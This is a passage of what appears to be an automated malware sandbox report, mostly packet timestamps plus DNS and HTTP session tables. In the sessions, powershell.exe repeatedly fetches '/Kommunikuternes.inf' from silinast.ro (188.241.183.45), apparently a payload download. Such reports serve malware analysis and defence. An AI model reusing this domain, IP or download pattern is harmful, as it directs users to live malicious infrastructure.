                        Oct 8, 2024 10:59:46.726598024 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:46.726690054 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:46.731753111 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.403297901 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.403347015 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.403382063 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.403429985 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.403445959 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.403479099 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.403513908 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.403541088 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.403544903 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.403559923 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.403578043 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.403609991 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.403636932 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.403645039 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.403695107 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.408705950 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.408754110 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.408790112 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.408818960 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.408819914 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.408900023 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.516439915 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.516494989 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.516530037 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.516561985 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.516593933 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.516624928 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.516622066 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.516622066 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.516659975 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.516714096 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.516771078 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.516824007 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.516825914 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.516858101 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.516891003 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.516912937 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.516923904 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.516971111 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.517781973 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.517832994 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.517867088 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.517899036 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.517936945 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.517981052 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.517981052 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.518332005 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.518404961 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.518420935 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.518457890 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.518490076 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.518522024 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.518527031 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.518584013 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.519061089 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.519113064 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.519170046 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.521852970 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.561928034 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.628915071 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.628958941 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.628995895 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.629021883 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.629180908 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.629214048 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.629229069 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.629247904 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.629280090 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.629292965 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.629313946 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.629347086 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.629374027 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.629415035 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.629472971 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.629571915 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.629605055 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.629640102 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.629646063 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.629672050 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.629704952 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.629714966 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.630145073 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.630191088 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.630197048 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.630228996 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.630275965 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.630279064 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.630311012 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.630343914 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.630350113 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.631094933 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.631144047 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.631145000 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.631176949 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.631218910 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.631256104 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.631288052 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.631319046 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.631335020 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.631354094 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.631417990 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.632055044 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.632086992 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.632128000 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.632134914 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.632167101 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.632199049 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.632214069 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.632230043 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.632263899 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.632270098 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.632821083 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.632869959 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.632872105 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.632905960 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.632946968 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.632949114 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.632981062 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.633013010 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.633023977 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.633044958 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.633099079 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.634030104 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.634104967 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.634150028 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.634226084 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.634258986 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.634299994 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.634308100 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.634339094 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.634371996 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.634382963 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.634857893 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.634918928 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.742021084 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.742074966 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.742130995 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.742130041 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.742166042 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.742213964 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.742219925 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.742253065 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.742286921 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.742300987 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.742319107 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.742352962 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.742366076 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.742386103 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.742419958 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.742429972 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.742679119 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.742721081 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.742726088 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.742738962 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.742788076 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.742899895 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.742916107 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.742930889 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.742954969 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.744395971 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.744440079 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.744453907 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.744460106 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.744491100 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.744514942 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.744529963 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.744544029 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.744559050 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.744571924 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.744610071 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.744649887 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.744664907 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.744679928 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.744700909 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.744740963 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.744755983 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.744771957 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.744784117 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.744826078 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.744913101 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.744926929 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.744940996 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.744955063 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.744970083 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.744970083 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.744983912 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.744998932 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.744999886 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.745018005 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.745219946 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.745234966 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.745249033 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.745261908 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.745263100 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.745277882 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.745290995 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.745294094 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.745306969 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.745315075 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.745321989 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.745337009 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.745346069 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.745352983 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.745407104 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.745431900 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.745477915 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.745497942 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.745512962 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.745559931 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.745599985 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.745615005 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.745629072 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.745644093 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.745654106 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.745693922 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.745740891 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.745755911 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.745769024 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.745784044 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.745793104 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.745798111 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.745820999 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.747237921 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.747262001 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.747277975 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.747287035 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.747318029 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.747324944 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.747339964 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.747380018 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.747402906 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.747419119 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.747473955 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.747495890 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.747510910 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.747525930 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.747540951 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.747555017 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.747556925 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.747584105 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.747597933 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.747611046 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.747608900 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.747629881 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.747677088 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.747755051 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.747805119 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.747818947 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.747843981 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.747875929 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.747890949 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.747915983 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.747922897 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.747937918 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.747951984 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.747961044 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.748003006 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.748070955 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.748109102 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.748122931 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.748147964 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.748171091 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.748184919 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.748344898 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.829524040 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.829571009 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.829626083 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.829659939 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.829691887 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.829725027 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.829729080 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.829729080 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.829756975 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.829770088 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.829790115 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.829821110 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.829824924 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.829854012 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.829883099 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.829896927 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.829914093 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.829950094 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.829952955 CEST4975780192.168.2.4188.241.183.45
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Oct 8, 2024 10:59:18.046071053 CEST | 50098 | 53 | 192.168.2.4 | 1.1.1.1
                        Oct 8, 2024 10:59:18.962591887 CEST | 53 | 50098 | 1.1.1.1 | 192.168.2.4
                        Oct 8, 2024 10:59:21.851044893 CEST | 61291 | 53 | 192.168.2.4 | 1.1.1.1
                        Oct 8, 2024 10:59:21.931741953 CEST | 53 | 61291 | 1.1.1.1 | 192.168.2.4
                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                        Oct 8, 2024 10:59:18.046071053 CEST | 192.168.2.4 | 1.1.1.1 | 0x15f2 | Standard query (0) | 6777.6777.6777.677e | A (IP address) | IN (0x0001) | false
                        Oct 8, 2024 10:59:21.851044893 CEST | 192.168.2.4 | 1.1.1.1 | 0xa03b | Standard query (0) | silinast.ro | A (IP address) | IN (0x0001) | false
                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        Oct 8, 2024 10:59:18.962591887 CEST | 1.1.1.1 | 192.168.2.4 | 0x15f2 | Name error (3) | 6777.6777.6777.677e | none | none | A (IP address) | IN (0x0001) | false
                        Oct 8, 2024 10:59:21.931741953 CEST | 1.1.1.1 | 192.168.2.4 | 0xa03b | No error (0) | silinast.ro |  | 188.241.183.45 | A (IP address) | IN (0x0001) | false
                        • silinast.ro
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.4 | 49737 | 188.241.183.45 | 80 | 7468 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 8, 2024 10:59:21.941854954 CEST | 174 | OUT | GET /Kommunikuternes.inf HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: silinast.ro
                        Connection: Keep-Alive


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        1 | 192.168.2.4 | 49738 | 188.241.183.45 | 80 | 7468 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 8, 2024 10:59:21.964584112 CEST | 174 | OUT | GET /Kommunikuternes.inf HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: silinast.ro
                        Connection: Keep-Alive


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        2 | 192.168.2.4 | 49739 | 188.241.183.45 | 80 | 7468 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 8, 2024 10:59:26.551490068 CEST | 80 | OUT | GET /Kommunikuternes.inf HTTP/1.1
                        Host: silinast.ro
                        Connection: Keep-Alive


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        3 | 192.168.2.4 | 49740 | 188.241.183.45 | 80 | 7468 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 8, 2024 10:59:26.562544107 CEST | 80 | OUT | GET /Kommunikuternes.inf HTTP/1.1
                        Host: silinast.ro
                        Connection: Keep-Alive


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        4 | 192.168.2.4 | 49741 | 188.241.183.45 | 80 | 7468 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 8, 2024 10:59:30.618431091 CEST | 80 | OUT | GET /Kommunikuternes.inf HTTP/1.1
                        Host: silinast.ro
                        Connection: Keep-Alive


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        5 | 192.168.2.4 | 49742 | 188.241.183.45 | 80 | 7468 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 8, 2024 10:59:30.630270004 CEST | 80 | OUT | GET /Kommunikuternes.inf HTTP/1.1
                        Host: silinast.ro
                        Connection: Keep-Alive


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        6 | 192.168.2.4 | 49751 | 188.241.183.45 | 80 | 7468 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 8, 2024 10:59:34.632853985 CEST | 80 | OUT | GET /Kommunikuternes.inf HTTP/1.1
                        Host: silinast.ro
                        Connection: Keep-Alive


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        7 | 192.168.2.4 | 49752 | 188.241.183.45 | 80 | 7468 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 8, 2024 10:59:34.643678904 CEST | 80 | OUT | GET /Kommunikuternes.inf HTTP/1.1
                        Host: silinast.ro
                        Connection: Keep-Alive


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        8 | 192.168.2.4 | 49753 | 188.241.183.45 | 80 | 7468 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Timestamp | Bytes transferred | Direction | Data
